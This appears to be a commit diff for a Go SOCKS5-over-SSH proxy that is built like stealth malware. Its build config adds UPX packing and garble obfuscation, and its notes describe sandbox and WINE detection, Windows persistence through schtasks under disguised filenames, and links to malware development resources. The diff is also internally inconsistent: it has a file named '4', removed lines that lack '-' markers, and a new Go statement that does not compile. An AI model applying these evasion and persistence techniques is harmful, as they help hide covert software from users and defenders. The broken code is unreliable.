10 changed files with 27 additions and 117 deletions
--- a/.goreleaser.yaml
+++ b/.goreleaser.yaml
@ -26,30 +26,13 @@ builds:
    goarch:
      - amd64
    ldflags:
-      - -w -trimpath
+      - -s -trimpath
    gobinary: "scripts/garble.sh"
    buildmode: c-shared
    tags:
      - release
      - dll
  - id: "win-dll-loader"
    env:
      - CGO_ENABLED=1
      - CC=x86_64-w64-mingw32-gcc
      - CXX=x86_64-w64-mingw32-g++
    main: ./cmd/win-dll-runner/main.go
    ldflags:
      - -w
    gobinary: "scripts/garble.sh"
    goos:
      - windows
    goarch:
      - amd64
    tags:
      - release
  - id: "win-release"
    env:
      - CGO_ENABLED=1
@ -60,7 +43,7 @@ builds:
    goarch:
      - amd64
    ldflags:
-      - -w -H=windowsgui
+      - -H=windowsgui
    gobinary: "scripts/garble.sh"
    tags:
      - release
@ -69,7 +52,7 @@ upx:
  - # Whether to enable it or not.
    #
    # Templates: allowed.
-    enabled: false
+    enabled: true
    # Filter by build ID.
    #ids: [build1, build2]
--- a/4
+++ b/4
@ -1,4 +1,4 @@
-SOURCES=Makefile main.go main_release.go main_debug.go config.go config_release.go config_template.go system.go system_windows.go system_linux.go system_darwin.go
+SOURCES=Makefile main.go main_release.go main_debug.go config.go config_release.go config_template.go system.go system_windows.go system_unix.go
 GARBLE_BIN = $(shell go env GOPATH)/bin/garble
 GARBLE_CMD = $(GARBLE_BIN) -literals -tiny
@ -14,7 +14,7 @@ test: socks5-ssh-proxy
 test-release: socks5-ssh-proxy.release
 	./socks5-ssh-proxy.release
 socks5-ssh-proxy: $(SOURCES) 
-	GOOS=linux GOARCH=amd64 go build -tags release,linux -o $@
+	go build -o $@
 socks5-ssh-proxy.release: resources $(SOURCES) $(GARBLE_BIN)
 	GOOS=darwin GOARCH=amd64 $(GARBLE_CMD) build -tags release -o $@
 	upx $@
--- a/README.md
+++ b/README.md
@ -62,3 +62,19 @@ Following detections have been tested:
 * upx
 * goreleaser
 * mingw-w64 (for building the windows dll/exe)
 ## Related information
 * <https://github.com/rootkit-io/awesome-malware-development>
 * <https://github.com/rshipp/awesome-malware-analysis#readme>
 * <https://github.com/Karneades/awesome-malware-persistence#readme>>
 * <https://www.yourcts.com/2024/01/19/beware-of-new-go-based-malware/>
 * <https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6>
 * <https://emulator41.medium.com/golang-malware-used-by-cybercriminals-408276a276c8>
 * <https://synzack.github.io/Tunneling-Traffic-With-SSL-and-TLS/>
 ## Development information
 * <https://pypi.org/project/unipacker/>
 * <https://medium.com/analytics-vidhya/running-go-code-from-python-a65b3ae34a2d>
 * <https://github.com/burrowers/garble?tab=readme-ov-file#mechanism>>
--- a/cmd/win-dll-runner/main.go
+++ b/cmd/win-dll-runner/main.go
@ -5,6 +5,7 @@ package main
 import (
 	"golang.org/x/sys/windows"
 	"os"
 )
 func runMainFromDLL() {
@ -16,7 +17,7 @@ func runMainFromDLL() {
 		return
 	}
-	_, _, _ = runMainFunc.Call()
+	_, _, _ := runMainFunc.Call()
 }
 func main() {
--- a/docs/NOTES.md
+++ b/docs/NOTES.md
@ -46,44 +46,9 @@ Check if running under wine by testing if executables are present:
 * The "VMK" environment variable is the VerboseModeKey which enables logging to stdout/stderr even in release build
 ## OS and emulator/environment detector
 * Linux
  * Native
  * Msys (Windows)
  * CYGWIN (Windows)
  * [Microsoft WSL & WSLv2](https://github.com/microsoft/WSL/issues/4071)
  * [FreeBSD linuxemu](https://docs.freebsd.org/en/books/handbook/linuxemu/)
 * Windows
  * WINE
  * ReactOS
  * Native
 * Darwin (macOS)
 ## Windows
 * Copy to well known current user binary path to semi related filenames
 * Run via start menu item for current user, or via `schtasks`
  * <https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create>
  * <https://github.com/emersion/go-autostart>
 ## Detection
 * <https://www.logpoint.com/en/blog/deep-dive-on-malicious-dlls/>
 * <https://github.com/sandflysecurity/sandfly-entropyscan>
 * <https://pypi.org/project/unipacker/>
 ## Related information
 * <https://github.com/rootkit-io/awesome-malware-development>
 * <https://github.com/rshipp/awesome-malware-analysis#readme>
 * <https://github.com/Karneades/awesome-malware-persistence#readme>>
 * <https://www.yourcts.com/2024/01/19/beware-of-new-go-based-malware/>
 * <https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6>
 * <https://emulator41.medium.com/golang-malware-used-by-cybercriminals-408276a276c8>
 * <https://synzack.github.io/Tunneling-Traffic-With-SSL-and-TLS/>
 ## Development information
 * <https://medium.com/analytics-vidhya/running-go-code-from-python-a65b3ae34a2d>
 * <https://github.com/burrowers/garble?tab=readme-ov-file#mechanism>>
--- a/go.mod
+++ b/go.mod
@ -6,13 +6,13 @@ require (
 	github.com/cloudfoundry/socks5-proxy v0.2.120
 	github.com/xor-gate/sshfp v0.0.0-20200411085609-13942eb67330
 	golang.org/x/crypto v0.25.0
 	golang.org/x/sys v0.22.0
 )
 require (
 	github.com/cloudfoundry/go-socks5 v0.0.0-20180221174514-54f73bdb8a8e // indirect
 	github.com/miekg/dns v1.1.29 // indirect
 	golang.org/x/net v0.27.0 // indirect
 	golang.org/x/sys v0.22.0 // indirect
 )
 replace github.com/cloudfoundry/socks5-proxy v0.2.120 => github.com/xor-gate/socks5-proxy v0.0.0-20240724155447-4b9ab1a56d38
--- a/system.go
+++ b/system.go
@ -156,8 +156,6 @@ func systemIgnoreAllSignals() {
 }
 func systemOSDetect() {
 	systemGetUname()
 	wineVersion := systemGetWINEVersion()
 	log.Println("WINE version", wineVersion)
 	log.Println("IsUserRoot", systemIsUserRoot())
--- a/system_linux.go
+++ b/system_linux.go
@ -1,49 +0,0 @@
 //go:build linux
 // +build linux
 package main
 import (
 	"log"
 	"syscall"
 	"strings"
 )
 func systemGetWINEVersion() string {
 	return ""
 }
 func systemGetUname() {
 	var uts syscall.Utsname
 	err := syscall.Uname(&uts)
 	if err != nil {
 		log.Println("Error getting system information:", err)
 		return
 	}
 	// Convert the byte arrays to strings
 	sysname := int8SliceToString(uts.Sysname[:])
 	release := int8SliceToString(uts.Release[:])
 	version := int8SliceToString(uts.Version[:])
 	// Check for FreeBSD Linux emulation specific indicators
 	log.Println("syscall.Uname:", "(sysname)", sysname, "(release)", release, "(version)", version)
 	if strings.Contains(sysname, "Linux") && strings.Contains(version, "FreeBSD") {
 		log.Println("Running under FreeBSD linuxemu")
 	}
 }
 // int8SliceToString converts a slice of int8 to a string.
 func int8SliceToString(int8Slice []int8) string {
 	// Create a byte slice with the same length as the int8 slice
 	byteSlice := make([]byte, len(int8Slice))
 	for i, v := range int8Slice {
 		byteSlice[i] = byte(v)
 	}
 	return string(byteSlice)
 }
 func systemIsUserRoot() bool {
 	return false
 }
--- a/system_darwin.go
+++ b/system_darwin.go
@ -1,14 +1,13 @@
-//go:build darwin 
+//go:build !windows
-// +build darwin
+// +build !windows
 //
 package main
 func systemGetWINEVersion() string {
 	return ""
 }
 func systemGetUname() {
 }
 func systemIsUserRoot() bool {
 	return false
--- a/system_windows.go
+++ b/system_windows.go
@ -26,9 +26,6 @@ func systemGetWINEVersion() string {
 	return wineVersion
 }
 func systemGetUname() {
 }
 func systemIsUserRoot() bool {
 	root := true